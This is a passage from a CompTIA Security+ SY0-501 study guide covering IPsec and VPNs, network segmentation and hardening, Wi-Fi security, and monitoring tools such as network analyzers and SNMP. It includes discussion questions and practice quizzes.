operates at Layer 3, it can protect all IP traffic on a network without needing any explicit application support.
IPsec is actually a suite comprised of three protocols: used together, they provide confidentiality, integrity,
and authenticity. They're all based on the idea of security associations (SAs) between two or more
communicating nodes. An SA defines a policy for unidirectional flow of data from one point to another:
security methods, endpoint addresses and ports, and so on. All traffic falling under a specific SA is treated the
same in terms of security standards. Since an SA is unidirectional, secure bidirectional communication
between two hosts requires each to establish an SA for traffic directly to the other.

Internet Key Exchange Negotiates and authenticates SAs between two hosts and, exchanges encryption
(IKE) keys to set up a secure channel. It also manages existing SAs, and periodically
replaces keys during a session. It's actually a specific implementation of the
Internet Security Association and Key Management Protocol (ISAKMP)
framework for key exchange.
Authentication Header Provides data integrity and source authentication through cryptographic hashes of
(AH) the packet contents and source identity. Also provides protection features for the
IP header itself.
Encapsulating Security Encrypts the packet payload itself, along with integrity and authentication
Payload (ESP) information.

252 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

The three protocols don't have to be used together. AH and ESP both provide integrity and authentication, so
if you don't need both an encrypted payload and a protected header you don't need to use both. In fact, since
using both protocols requires two SAs in each direction and additional processing overhead, it's common to
use only one of the two. IKE can't be dispensed with, but it can be replaced with other ISAKMP
implementations.
Since it provides tunneling and the entire CIA triad, IPsec can be used as a complete VPN solution in itself,
and there are some clients that do so. An IPsec-only approach has some limitations though, which are why
traditional clients use it along with L2TP.
 IPsec can tunnel only IP traffic, while L2TP can work with any L3 protocol or even L2 protocols.
 L2TP is usable over existing PPP infrastructure, so requires less modification for existing networks.
 IPsec authentication relies on host-based keys or certificates, while L2TP allows user-based
authentication systems like RADIUS. Newer IPsec implementations allow additional authentication
methods.

IKE negotiation
IKE, presently at version 2, functions to negotiate and maintain SAs, creating tunnels that carry AH and ESP
traffic. The entire IPsec process uses cryptographic tools for several purposes, and there are multiple options
for each of them.
 For authentication, host, or peer, identities are established through X.509 certificates or preshared keys.
Keys require less infrastructure and expense, but are harder to maintain on large networks. Some
implementations allow other methods, like EAP, or Kerberos authentication within a Kerberos
realm/domain.
 Key exchange is performed with any of a number of Diffie-Hellman algorithms.
 Data encryption ciphers include AES, Blowfish, 3DES, or DES, with the usual caveat that DES is no
longer secure.
 Integrity hashes include MD5, SHA-1, and SHA-2.

The IKE process begins when a peer notices "interesting" traffic; that is, traffic which matches patterns
defined in its IPsec settings. For example, on a site-to-site VPN, a router might initiate IPsec whenever traffic
from its internal subnet is addressed to a specific other subnet.
IKE performs negotiations in multiple request/reply exchanges, where the initiator lists acceptable security
settings and the responder sends back its chosen options. The specifics differ a lot between IKEv1 and IKEv2.
While both perform the same functions in the same order, IKEv2 uses fewer exchanges and uses different
terminology.
In both versions there are two primary phases to negotiation.

CompTIA Security+ Exam SY0-501 253


Chapter 5: Securing networks / Module B: Transport encryption

1. The peers authenticate each other and negotiate an initial bidirectional SA that enables them to secretly
perform further negotiations. In IKEv1 this is called an ISAKMP tunnel and both peers must use the same
authentication method, while in IKEv2 it is an IKE SA and each peer can use its own valid authentication
method in what's called asymmetric authentication.
2. The peers use the initial SA to negotiate the SAs that actually carry data. This is where encryption and
other settings are defined for AH and/or ESP. In IKEv1 the resulting combination is called an IPsec
tunnel, and in IKEv2 they're all called child SAs.
IKEv2 has a number of improvements over IKEv1. Some of them are simplification and refinement: it can
negotiate more quickly and efficiently, it has fewer redundant communication and encryption options so that
peers can be configured more easily, some vulnerabilities were fixed, and it has increased reliability features.
Others are entirely new features: IKEv2 supports EAP authentication for remote access LANs, it has support
for numerous new extensions, and it can work for environments where IKEv1 had problems, like multi-
homing mobile clients or connections that pass through NAT devices. Both versions are generally considered
very secure when properly configured; however, leaked US government documents suggest IKE has
unpublished vulnerabilities the NSA, and perhaps others, are able to exploit.

IPsec traffic
Both AH and ESP carry data protected by IKE's keys. Since they offer different services, they can be
combined for maximum security, but since they also have a lot of overlap, it's more common to pick just one
for performance reasons.

Exam Objective: CompTIA SY0-501 2.1.2.2


Both protocols can operate in two modes: tunnel, or transport.
 In tunnel mode IPsec encapsulates and protects the entire IP packet, appends its own protocol header,
and adds a new IP header for tunneling over the public network. The original packet is fully protected
by AH or ESP, while the outer IP header can use different IP addresses. Tunnel mode is popular for site-
to-site configurations, and allows IPsec to be a more complete VPN solution, but it comes at the cost of
increased overhead and chance of packet fragmentation.
 In transport mode, IPsec creates its cryptographic protections for the packet, then inserts them. It uses
the original IP header, but changes the protocol ID to show that it's IPsec traffic. Transport mode is
useful just to secure ordinary end-to-end IP traffic without using a VPN; it can also be used to secure
VPNs using other, non-secure tunneling protocols like GRE.

Of the two protocols, ESP is more complicated. It's more computationally expensive because encrypting and
decrypting the entire payload takes a lot of mathematical work. It also has a lot of packet size overhead even
in transport mode: not only does each packet have an ESP header in the front and an Integrity Check Value
(ICV) hash value at the end, it also has an ESP trailer with both protocol data and additional padding. The
overall length is variable for all three: the encryption cipher might require an initialization vector in the
header, it block size determines how much padding is needed to round the payload out to an even number of
blocks, and the ICV hash size depends on its own algorithm.
Encryption is applied to the entire IP packet (tunnel mode) or just its payload (transport mode), as well as the
ESP trailer. The ESP header is not encrypted, but is included with all encrypted values in the ICV hash.

254 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

AH uses a single Authentication Header, thus the name. It contains protocol configuration data as well as an
ICV hash. Nothing's encrypted, but everything is signed for integrity by the ICV. Even the IP header is signed,
with the exception of fields that need to be able to change in transit, like TTL and the header checksum. This
is the source of one of AH's big limitations: source and destination IP addresses are themselves signed for
integrity, and thus protected from outside modification. Since NAT relies on changing IP addresses, it's not
compatible with AH even in tunneling mode.

Since it provides data confidentiality as well as integrity, ESP is the more popular protocol on today's
networks despite its additional overhead. It also is more compatible with NAT traversal in tunnel mode,
though since the TCP/UDP header is encrypted it still has problems with PAT. AH is preferred in more
specialized cases, like when it's more vital to ensure traffic comes only from trusted sources, or when QoS or
security systems along the way need to inspect packet contents and encryption would get in the way.

Note: NAT traversal in general has been a big stumbling block to wider adoption of IPsec in IPv4
networks: it's common for NAT gateways to incorporate special settings for IPsec traffic, but it's still a
bit of a kludge. Consider it another example of why network engineers hope to move networks to IPv6,
where there's no shortage of global addresses, and IPsec is easily supported even for ordinary end-to-
end traffic.

CompTIA Security+ Exam SY0-501 255


Chapter 5: Securing networks / Module B: Transport encryption

Creating VPN connections


There are many ways to connect to a VPN, depending on your operating system.

 A wide variety of third-party clients are available for any operating system, and many support more
features than those built into the operating system. Some VPN solutions require use of a specific client.
 Windows 7 and later include support for VPNs using PPTP, L2TP/IPSec, SSTP, and IKEv2.
Authentication methods include password, certificate, OTP, and smart card.
a) In the Network and Sharing Center window, click Set up a new connection or network.
b) Choose Connect to a workplace and click Next.
c) Enter your VPN information as provided by a network administrator.
 Windows 8.1 and Windows 10 include an updated client that supports additional VPN providers and
allows easier customization.
a) In the Settings window, click Network & Internet > VPN.
b) Click Add a VPN connection.
c) Enter your VPN information as provided by a network administrator.
 To create a VPN connection in Mac OS, open the Network window and click Add > VPN.
 To create a VPN connection in Android, navigate to Settings > Wireless And Networks > More >
VPN.
 To create a VPN connection in iOS, navigate to Settings > General > VPN.

Discussion: VPN technologies


1. Why might you choose a L2TP/IPsec VPN over SSL/TLS, or vice-versa?
L2TP/IPsec is natively supported by modern operating systems, and since it relies on low-level protocols
it can secure all communications without significant compatibility problems. SSL/TLS can be higher
performance and more secure, but it's less universally supported.
2. Why would you choose AH over ESP for IPsec, even though it doesn't encrypt packet payloads?
AH has higher performance, but usually it's for more specialized reasons, like when guaranteeing
authenticity is the most important thing, or when content filters or QoS devices need to inspect packet
contents.
3. What role does GRE play in a VPN?
GRE doesn't provide any security: it just allows virtual point-to-point connections over an IP network.

256 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module B: Transport encryption

Assessment: Transport encryption


1. Order WAP encryption methods from most to least secure.

1. WEP
2. WPA-AES
3. WPA-TKIP
4. WPA2-AES
5. WPA2-TKIP
2. Your WAP is currently secured with WPA Personal encryption, using a shared key. Which of the
following is true? Choose the best response.
 Enabling WPS could increase security, but enabling 802.1X would reduce it.
 Enabling 802.1X could increase security, but enabling WPS would reduce it.
 Enabling either WPS or 802.1X could increase security.
 Enabling either WPS or 802.1X would reduce security.

3. On an IPsec VPN, what protocol negotiates security associations? Choose the best response.
 AH
 ESP
 IKE
 L2TP

4. What secure protocols add SSL/TLS security to protocols which were insecure on their own? Choose all
that apply.
 FTPS
 HTTPS
 SFTP
 SNMPv3
 SSH

5. What VPN type is secure, compatible with nearly any application, and supported by most operating
systems?
 L2TP/IPsec
 PPTP
 SSH
 SSL/TLS

6. You can use a VPN to securely encrypt all of your network communication even on an open Wi-Fi
network. True or false?
 True
 False

CompTIA Security+ Exam SY0-501 257


Chapter 5: Securing networks / Module B: Transport encryption

7. What security appliance is similar to a MitM attack, but designed to enhance network security rather than
disrupt it? Choose the best response.
 Split tunnel
 SSL accelerator
 SSL decryptor
 VPN concentrator

8. You have a lingering problem with mobile users who connect to untrusted Wi-Fi networks without
enabling their VPN, out of forgetfulness or lack of technical knowledge. What technology might help
solve the problem? Choose the best response.
 Always-on VPN
 ESP
 Full tunneling
 Secure shell

258 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module C: Hardening networks

Module C: Hardening networks


It's possible, if not ideal, to secure a host just by finding each individual vulnerability and closing or
minimizing it. While it's tempting to extend that sort of thinking to the network, by just securing each host
and tightening up the firewall, it's vital to think of the big picture as well as its components. To secure your
network, you need to create a unified policy that protects its components from outside and inside attack, and
all without disrupting normal network functions.
You will learn:
 About network segmentation
 How to harden network hosts and data
 How to harden network infrastructure devices

About network segmentation


Some early network experts saw security as a "hard shell" to put around the network, defending it from
outside attacks without disrupting normal internal operations. It didn't work very well: not only are many
threats on the inside, but any crack in that outer shell makes it easy for an external threat to become an
internal one. Today, network experts recommend a defense in depth strategy, where security is applied
throughout the entire organization. That way, an attacker who breaches one layer of defense still has to
overcome the rest.
Today's networks are complex and important enough that you need to consider the network as a whole
organization in itself, which needs to be broken into multiple levels, and secured on each. Not only do hosts
and devices need to be secured, but unless your organization is very small the network isn't just a collection of
hosts on an Ethernet switch.
One of the chief tools in your arsenal for securing the network is segmentation. By breaking the network up
into multiple zones, and controlling just how each zone can communicate with the others, you can both
protect against inside threats, and make sure that an outside attacker compromising one part of the network
doesn't gain access to everything. Fortunately, segmentation is a normal part of networking technologies, and
in fact something you ought to be doing anyway for performance and reliability reasons. Adding security to
your list of concerns just means that you have to keep some additional principles in mind when you do the
segmentation.
The key to segmentation is understanding how the network is broken up into collision domains, broadcast
domains, and subnets, and making sure that if two hosts or devices are close in the network's topology, that
they also share similar security needs and have a reason to communicate directly. By contrast, if two hosts
have different security needs, communication between them should be more regulated and indirect, even if it's
permitted.

CompTIA Security+ Exam SY0-501 259


Chapter 5: Securing networks / Module C: Hardening networks

Segmenting networks
It's important to segment networks in a planned, methodical fashion. Don't just draw boundaries where it
seems to make sense: consider where each device on the network fits in with its neighbors, what its security
needs are, and what sort of communications it requires.

Exam Objective: CompTIA SY0-501 3.2.2, 3.9.9

 The smallest network segment is the collision domain, as found in legacy networks separated by hubs,
and on wireless networks connected by a single WAP.
• On a wired collision domain there's no intrinsic privacy: any host can read all traffic and there's no way
to regulate communications. For this reason you should replace any legacy hubs on the network with
switches. Even an inexpensive switch with no additional security features will have security and
privacy benefits over a hub.
• A wireless hotspot can be a little better: provided encryption is in use there are some barriers from
hosts snooping on each other, but with many network configurations it's still not difficult for any client
with the encryption key to access all traffic.
• The most effective way to prevent cross-client snooping on a Wi-Fi network is to use WPA Enterprise
mode, also known as 802.1X. Since every client on the WPA Enterprise network has its own
credentials and keys, one client can't directly decrypt traffic sent to and from other clients.
 On modern switched Ethernet networks, the fundamental unit of segmentation is the broadcast domain.
While a broadcast domain has some level of traffic control, it's not really reliable: flooded packets and
broadcast traffic will travel throughout the segment, allowing eavesdropping. and any host in a broadcast
domain can directly communicate with any other. Hosts that need to communicate using non-routable
protocols in particular must share a broadcast domain, while those which are in different security zones
importantly must not.
 If you’re fortunate enough that your physical network topology is compatible with the security zones
you need, you can separate broadcast domains simply by having each on its own switch or switches, and
separate each with routers or even firewalls.
 More commonly, the best L2 segmentation option is using VLANs to logically separate traffic on a
physically switched network, each VLAN serving as its own broadcast domain. While a lot more
flexible than physical segmentation, this can be a little more challenging to configure: not only do you
need to make sure the VLAN configuration is correct, but VLAN trunk links carry traffic from multiple
broadcast domains. Not only does this make them prime targets for eavesdropping, but attackers can
exploit VLAN trunking protocols to create trunk links as part of a VLAN hopping attack.
 Regardless of whether they're physical or virtual, broadcast domains need to be separated by routers.
Typically, the best practice is for each broadcast domain to correspond to a single subnet. Subnets
themselves can be separated and individually secured according to their security needs.
 Network zones with different security needs should be joined only at "chokepoints" that can easily be
used to control traffic between them.
• Chokepoints are an ideal place for network security appliances such as firewalls, IDS/IPS, and
monitoring tools.
• No traffic should be able to pass between networks without being evaluated by a secured chokepoint,
especially when passing from a less secure network to a more secure one.
• To maximize network availability, ensure that connections and security appliances can handle expected
traffic loads without causing slowdowns - no one wants a security chokepoint to also be a performance
chokepoint.
 Give special consideration to network segments with particular vulnerabilities, or that carry much
different traffic types.

260 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module C: Hardening networks

• Use stricter isolation for segments with legacy devices and applications that are likely to use insecure
protocols or have unpatched vulnerabilities. If a host or application can't be effectively hardened, the
only option is to make it hard to reach.
• Restrict access to network segments holding particularly sensitive data. If it needs to be available for
outside access, make sure that appropriate security devices are in place, and use authentication and
encryption systems as needed.
• Where possible, limit outside access to specialized networks that aren't meant for normal data traffic,
like industrial control systems or SANs. Such networks tend to have limited internal security, but
they're by no means free of threats.
• While firewalls are a valuable part of any segmentation plan, adding a NIPS on the border of a
sensitive or static network gives better protection against inside attacks.
 If you need to join systems more directly over an untrusted network, configure them as members of a
VPN. Secure VPN protocols offer encryption and tunneling features that even allow secure
communications over an insecurely segmented network or unencrypted Wi-Fi network.
 When you absolutely must make sure it's impossible to launch a network attack from one network to
another, the only solution is an airgap: a complete isolation of the network with no connectivity to
outside systems. Airgapping is a common way to protect classified networks, mission-critical systems,
and other devices with security needs that outweigh the convenience of connectivity to standard
networks.
• A traditional air gap allows no physical layer (including wireless) connections to untrusted networks.
• VLANs can be used to emulate an air gap by giving no path into or out of an isolated network, but this
method is still subject to some attacks and misconfigurations.
• Unidirectional gateways can be used to send information one way into a network without allowing
information to come out. This prohibits most network attacks from functioning, but also most benefits
of networking.
• Even an airgap can't protect against exfiltration or malware, if it's done via removable storage or
computers that connect to the isolated network.

Securing network data


As useful as they are, networks are a natural enemy to data security: just connecting a system with sensitive
data to the network makes the data vulnerable to attackers. If the data is simply being stored, this risk can be
mitigated by securing hosts and applications, but the real challenge is securing the ever-increasing amount of
data that needs to be accessible from or transmitted through the network. In addition to the normal precautions
of securing data, you should consider its security from the network design perspective.

 Identify where sensitive data is stored on the network, whether it's designed for external access or not.
Make sure that all data is kept in a network security zone appropriate to its type and sensitivity level.
 Secure data at rest by making sure the hosts or devices storing it are hardened against attack, especially
unauthorized remote access.
 Secure data in transit using appropriate security measures.
• Over untrusted networks, use protocols with strong encryption and authentication features.
• When you must share data using insecure protocols, restrict it to small, trusted network segments
or secured VPNs.
 Identify information that's subject to particular legal or regulatory requirements, such as PCI-DSS or
HIPAA. Very often, these regulatory frameworks have specific requirements for network storage or
transmission of data—you'll need to make sure that such data secured in a way that meets both your
organization's needs and the regulatory body's standards.

CompTIA Security+ Exam SY0-501 261


Chapter 5: Securing networks / Module C: Hardening networks

Hardening network hosts and applications


The security needs of a network application or host depend largely on the security zone they're in, and what
sort of systems can access them. Hosts and applications accessible from the internet need the highest level of
security, while on trusted network segments you might be able to use insecure protocols and services.

 To prevent system sprawl and detect rogue devices, keep updated lists of just what hosts exist on the
network, along with the owner and purpose of each.
 Regularly apply new security updates to network applications and host operating systems.
• Centrally organize patch management in order to make sure that all hosts on the network are kept up to
date.
• Upgrade or replace legacy systems and applications that do not meet modern security standards.
• Apply special scrutiny to legacy systems which cannot be easily replaced.
 Disable all unnecessary services on hosts, and network features on applications.
 Ensure that appropriate host-based firewall software is installed and configured, and that only necessary
ports are left open.
 Install antivirus and antimalware software, along with any other required HIDS/HIPS software.
 Disable unnecessary user accounts, both local and domain-based.
 If a host is only directly accessed by its local users, disable remote login methods.
 Ensure that remotely accessible hosts use strong passwords and other authentication systems.
 Apply heightened scrutiny to network applications:
• Web browsers and email clients are popular targets of attack so should be carefully secured using
application settings and antimalware software features.
• Avoid insecure protocols such as Telnet, TFTP, SLIP, and SNMPv1 and v2. FTP and HTTP are harder
to avoid, but still use unencrypted data and clear text credentials: use SSL encryption for both when
possible.
• Configure security and encryption options for secure protocols like SNMPv3, SSL, SSH, and so on.
• Disable unnecessary network services, especially applications running on client machines.
 Establish policies for acceptable and unacceptable applications on network hosts. Even non-network
applications can have vulnerabilities; some might even be Trojan horses, or carry virus infections.
 Establish specific security requirements for devices that aren't a permanent part of the LAN.
• Company-owned laptops and mobile devices that may leave the premises
• User-owned laptops and mobile devices (Bring Your Own Device policies)
• Hosts joining the network via PPP or VPN
• External storage media, including portable hard drives or USB flash drives.
 Establish onboarding and offboarding procedures for devices added to or removed from the network,
and ensure that devices are joined only to appropriate network segments
 Monitor the network regularly for rogue hosts or unauthorized services.

Securing internal network infrastructure


Unless your security needs are off the chart, the internal network has some level of trust. It's a place where
hosts need to directly contact each other, and where you can safely host services you wouldn't put on the
Internet. That doesn't mean it's a place without cares or barriers though, especially in larger and more complex
enterprise networks.

262 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module C: Hardening networks

Exam Objective: CompTIA SY0-501 2.6.2.8, 3.3.2.8

 Harden network devices like switches, routers, and firewalls in much the same way as hosts, by keeping
them up to date and disabling unnecessary services.
 For network appliances running manufacturer firmware rather than fully-featured operating systems,
ensure the firmware is up to date and securely configured. If necessary, research third-party firmware
with additional security features.
 Ensure that management interfaces for network devices are secured against unauthorized access.
• Change default user names and passwords for all devices.
• Keep out-of-band management interfaces, such as terminal ports, physically secure.
• Configure web-based interfaces to only be accessible from internal or trusted networks, not from the
internet.
• Enable remote management only using secure protocols, such as SNMPv3 or SSH.
 Use network segmentation to control traffic through the internal network.
• Ensure that no traffic can move between segments with different security zones without passing
through a firewall or comparable security checkpoint.
• If using VLANs to segment broadcast domains, configure switch ports carefully to prevent VLAN
hopping attacks.
 Allocate network addresses carefully, and monitor each subnet for rogue devices.
 Use security features on routers and switches.
• Enable port security on Ethernet switches and MAC address filtering on WAPs.
• Enable ARP inspection to protect against ARP spoofing or poisoning attacks.
• On switches, enable DHCP snooping to protect against malicious DHCP traffic, such as rogue servers.
• On routers, configure ACLs for more detailed traffic shaping.
• Enable loop protection and flood guard features to protect against DoS attacks.
 Deploy specialized network security systems.
• Firewalls
• Content filters
• NIDS or NIPS
• Network-based antimalware
• UTM
 Use redundant security systems where appropriate. Ideally, redundant systems should be different
software from different vendors: this way, an attacker can't exploit a vendor-specific vulnerability to
bypass multiple layers of security.
 Deploy access control technologies.
• Authentication systems (Kerberos, RADIUS, etc.)
• VPN concentrators
• MAC filtering
• Posture assessments
 Utilize strong encryption for WAN or VPN connections to other trusted networks.

CompTIA Security+ Exam SY0-501 263


Chapter 5: Securing networks / Module C: Hardening networks

Securing perimeter networks


If your organization doesn't host externally accessible services your perimeter network will be very simple,
possibly just the external firewall used to block all unnecessary inbound traffic. Otherwise, you'll want some
sort of DMZ. Most precautions used on the internal network still apply, but you'll need to do a few things
differently.

 Open ports needed for necessary services, but keep other ports closed and services disabled.
 Never transmit sensitive data using insecure protocols.
 Configure perimeter hosts and especially bastion hosts to minimize their value to an attacker even if they
are compromised.
• Exposed hosts should hold no valuable data that isn't strictly necessary to their functions.
• Perimeter hosts should have little or no more permissions on the internal network than random internet
hosts.
 Ensure that there are strong firewall protections between the DMZ and the interior network.
 Harden any specialized security appliances designed to control traffic into interior networks.
• Proxy servers and load balancers
• VPN concentrators
• SSL accelerators
• DDoS mitigators
 Closely monitor any exposed systems for signs of intrusion.

Securing wireless access points


A typical wireless access point is a managed network appliance, much like a router or switch, but the
particulars of wireless technology mean that the security features and vulnerabilities are very different than
that of wired Ethernet devices. Wi-Fi networks with weak security should always be kept on the perimeter
network.

Exam Objective: CompTIA SY0-501 2.1.8.1, 2.1.8.2, 2.3.7.3

 Update firmware and secure management interfaces just as you would for a managed switch or router.
 Enable the strongest Wi-Fi encryption compatible with all connecting clients.
• In order from strongest to weakest, choose WPA2-AES, WPA-AES, WPA2-TKIP, or WPA-TKIP.
• WEP encryption should be considered insecure, and only used if the alternative is no encryption at all.
• If possible, upgrade or replace legacy clients that don't support strong encryption.
 WPS (Wi-Fi Protected Setup) has known vulnerabilities and should be disabled if possible.
 If possible, use 802.1X (WPA Enterprise) authentication. This will require an external authentication
system such as a RADIUS server.
 If you must use an open wireless network, make sure it can't directly access trusted networks. Configure
a VPN to allow authenticated wireless clients to securely access the network.
 Choose a unique SSID for your network: the particulars of Wi-Fi encryption mean that more common
SSIDs can be easier to hack.
 If your Wi-Fi network is for private use, disable SSID broadcast and use MAC filtering to limit what
clients can connect. These are not strong security measures, but will discourage casual attackers.
 Enable guest networks for untrusted clients.

264 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module C: Hardening networks

 Especially if a WAP is designed for guest or public access, configure a captive portal requiring users to
identify themselves and accept your network usage policies.
 Place WAP antennas not only to maximize signal strength where authorized users need it, but to
minimize signal outside of physically secure areas.
• To reduce overall coverage area, reduce antenna broadcast power in WAP settings.
• To shape the coverage area, change antenna orientation, or add reflectors or unidirectional antennas.
• Verify coverage areas using a Wi-Fi analyzer.
 Perform periodic site surveys to verify Wi-Fi coverage and to look for rogue access points.

Discussion: Network hardening


1. What is the guiding principle of network segmentation?
The key to segmentation is understanding how the network is broken up into collision domains, broadcast
domains, and subnets, and making sure that if two hosts or devices are close in the network's topology,
that they also share similar security needs and have a reason to communicate directly. By contrast, if two
hosts have different security needs, communication between them should be more regulated and indirect,
even if it's permitted.
2. Describe the steps you'd take to make sure a computer on your home network was properly secure.
Answers may vary.
3. What examples have you seen of serious security incidents that resulted in part from not using defense in
depth policies?
Answers may vary.

Assessment: Hardening networks


1. A perimeter network needs most of the same security precautions as a trusted network, just with a few
extra concerns. True or false?
 True
 False

2. It's a safe assumption that an attacker with physical access to a system can compromise any other security
measures given time. True or false?
 True
 False

3. What's the most essential tool for segmenting broadcast domains? Choose the best response.
 Bridges
 Routers
 Switches
 VLANs

4. What feature primarily helps to protect against DoS attacks? Choose the best response.
 Authentication systems
 DMZ

CompTIA Security+ Exam SY0-501 265


Chapter 5: Securing networks / Module C: Hardening networks

 Loop protection
 SNMPv3

5. If there are two firewalls between the internet and the interior network, they should be from different
vendors. True or false?
 True
 False

6. What security feature is especially important for preventing rogue devices on the network? Choose the
best response.
 DMZ
 Loop protection
 Port security
 VPN

7. Which Wi-Fi feature should you disable to improve security? Choose the best response.
 802.1X
 MAC filtering
 WPA2
 WPS

8. A critical network service is hosted on a legacy server running an obsolete operating system, and you
can't replace it until next fiscal year. You just learned it is extremely vulnerable to a new worm that's
appeared on other computers on your network, but you can't update the server or install software that will
protect it. What can you place between the server and the rest of the network to protect it? Choose the
best response.
 Airgap
 Firewall
 HIDS
 NIPS

266 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

Module D: Monitoring and detection


No matter how well you harden the network, it's not a task you can do and walk away from. Even if you
continue to keep systems and software up to date and listen for IDS alerts, you're still only doing half the job.
Securing the network is an ongoing process, requiring active monitoring and continual awareness of changes
in network conditions.
You will learn:
 About system and network monitoring tools
 How to monitor network activity

Monitoring tools
As much as the network is a vector for attack, it's also key to detecting threats to your organization's
resources. Not only can you detect security problems using network security components and monitoring for
suspicious traffic, but you can use the network to centrally monitor individual hosts even for security
incidents that aren't network-based.

Exam Objective: CompTIA SY0-501 2.2.3


In addition to security-specific systems like NIDS, there are a wide variety of tools you can use in conjunction
with network administrators to watch problems. Many of them are designed primarily to detect performance
issues or impending network failures rather than security incidents, but even these are valuable for detecting
suspicious traffic or unusual events, or include functions easily adapted to security purposes. Depending on its
exact functions, a monitoring tool might be a dedicated piece of hardware, or software installed on a network
device or host, and either way multiple functions might be combined into a single tool. Likewise, it might be a
permanent part of the network, or only temporarily attached for diagnostic purposes.

Network analyzer Captures and analyzes network traffic. Can read packet headers to determine traffic
patterns, or view protocol information in depth. Also known as a packet analyzer or
protocol analyzer.
Interface monitor Examines traffic over a specific network interface, for example one port on a router.
Usually it's one component of software which monitors an entire network device, or
even many devices across a network.
Port mirrors Ports on a switch or other network device configured to copy traffic on other links,
and forward it to a logging or analysis system.
Top talkers/listeners Analyzes the network over time to find what nodes are the most frequent
transmitters (talkers) or recipients (listeners) of data. Useful not only for measuring
normal traffic and detecting bottlenecks, but to find attack sources and targets, or to
discover unexpected traffic patterns such as those caused by a rogue server or
compromised device.
Wireless analyzers Used to find congestion and reception on wireless networks. Also useful for mapping
coverage areas and detecting rogue APs.
SNMP management Often used for remotely managing network devices, but just as useful for gathering
software network information.
Logs Records kept by network hosts and devices about unusual, or even routine, network
events.
Syslog Collects system logs from network devices on a central server for analysis.

CompTIA Security+ Exam SY0-501 267


Chapter 5: Securing networks / Module D: Monitoring and detection

SIEM Security Information and Event Management software actively monitors and reports
on data collected by logging tools.
Physical monitoring Report on physical conditions that can affect network function, such as temperature,
tools humidity, or electrical power quality. Often part of overall environmental control or
safety systems.

Many monitoring tools can be configured to send alerts by email or SMS when preset emergency conditions
are met, but network monitoring is always most effective when administrators keep a constant eye out for
problems.

Network analyzers
Network analyzers, by whatever name you use, are one of the most powerful and versatile tools for network
monitoring and troubleshooting. They can be hardware devices, but typically an analyzer is a software
application installed onto a host like a laptop, with its NIC set to promiscuous mode. There are a wide variety
of packet sniffing applications, including Wireshark, tcpdump, and Microsoft Message Analyzer.

Exam Objective: CompTIA SY0-501 2.2.1, 2.2.2, 2.2.14.7, 2.2.14.8, 2.2.14.9

Wireshark, a popular network analyzer

You can use an analyzer to monitor a single interface, but to maximize the traffic it can gather you should
connect it either to a monitoring port on a switch, or to a hardware tap set on a busy network segment. Either
way, packet analysis can be used for a number of tasks.
 Mapping logical network structure
 Collecting statistics on overall network activity
 Finding rogue systems
 Finding network errors and congestion
 Detecting unusual packet characteristics
 Monitoring for specific traffic types

268 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

 Detecting network attacks


 Reverse engineering proprietary protocol structures
 Finding and capturing specific data from packets
 Locating potential vulnerabilities
 Verifying network security device functions

Some network analyzers such as netcat even allow for more complex and versatile network actions such as
file transfers and remote access.

Note: nmap and netcat are command line utilities that you can use directly, but it's easier to
accomplish many tasks by using a graphical front end tool that runs the utility itself in the background.
For example, Zenmap is a popular front-end for nmap.
As you can probably guess, the same features that make network analyzers ideal for an administrator to find
problems make it easy for an attacker or spy to illicitly gather sensitive or private information on the network.
This means they should only be installed and used with approval and oversight appropriate to network
security policies. Network administrators should likewise watch for unauthorized use of network analyzers,
both from outside and inside the network.

SNMP
Since its development in the late 1980s, SNMP has become the most popular standard for remotely
monitoring and managing network devices. An SNMP system includes several types of components.

CompTIA Security+ Exam SY0-501 269


Chapter 5: Securing networks / Module D: Monitoring and detection

Agent SNMP software running on a managed device. Originally managed devices were
generally network equipment such as switches, routers, or servers; but they can be
almost any IP device, including phones, cameras, and other hosts.
Manager A software application used to manage agents. The manager is sometimes called a
network management system (NMS), and the host that runs it a network management
station.
Object identifier A unique number corresponding to an object, something that can be monitored on a
(OID) managed device. For example, on a switch the up or down status of a particular
interface might be an object, as would be its rate of incoming traffic. (The actual value
of an object is called a variable.)
Management A database containing OIDs for a managed device, arranged in a tree-like hierarchical
Information Base fashion. The MIB is built into the agent, and a copy of its structure is imported into the
(MIB) NMS. This allows the two to communicate clearly about the device's functions.

SNMP packets generally use UDP, on ports 161 and 162. Each consists of a header containing the SNMP
version number, the community name that defines the SNMP network, and the PDU containing the actual
SNMP communications. There are several types of PDU, which vary somewhat depending on the protocol
version, but there are three common categories.

Get Manager-to-agent requests for information. A GetRequest PDU asks for the value
of a single variable or list of variables, but a GetNextRequest series or
GetBulkRequest can be used to walk through the entire MIB of a given agent
without even knowing its full contents. Also known as polling.
Set Manager-to-agent configuration commands. A SetRequest PDU changes the value
of a single variable or list of variables.
Response Agent-to-manager replies to Get or Set PDUs. Get responses report the requested
variables while Set responses acknowledge success or error conditions.
Trap Unsolicited agent-to-manager reports about variable states, usually used to report
significant changes of conditions without waiting for a GetRequest. The opposite
of polling.

SNMP polling from an NMS is a good way to view network conditions, while agents can be configured to
send notifications of problems or significant events via traps.

SNMP versions
There are three primary versions of SNMP in common use. In theory, only the newest, SNMPv3 is a current
IETF standard and all older versions are obsolete. In practice, a given SNMP implementation might support
two or even all three versions.

SNMPv1 The original version of the protocol. SNMPv1 has no real security features: the community name
string serves as a very simple form of authentication analogous to a password, but since it's
transmitted in cleartext it's rather easy to compromise even if it's not easy to guess.
SNMPv2c Improves functionality and performance over v1, but uses different message formats and adds
more PDU types, so it isn't directly backwards compatible. The original SNMPv2 included
security features, but they were unpopular due to their complexity, so it was never widely
adopted. SNMPv2c includes the other v2 functions, but uses the same community name
authentication as v1.

270 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

SNMPv3 Adds full cryptographic security to the protocol functions of SNMPv2c. This version doesn't
change message formats and makes little change to the protocol itself outside of security features,
but adds options for both authentication and encryption. SMNPv3 also defines some system
elements differently for conceptual and documentation purposes. A manager and SNMP-enabled
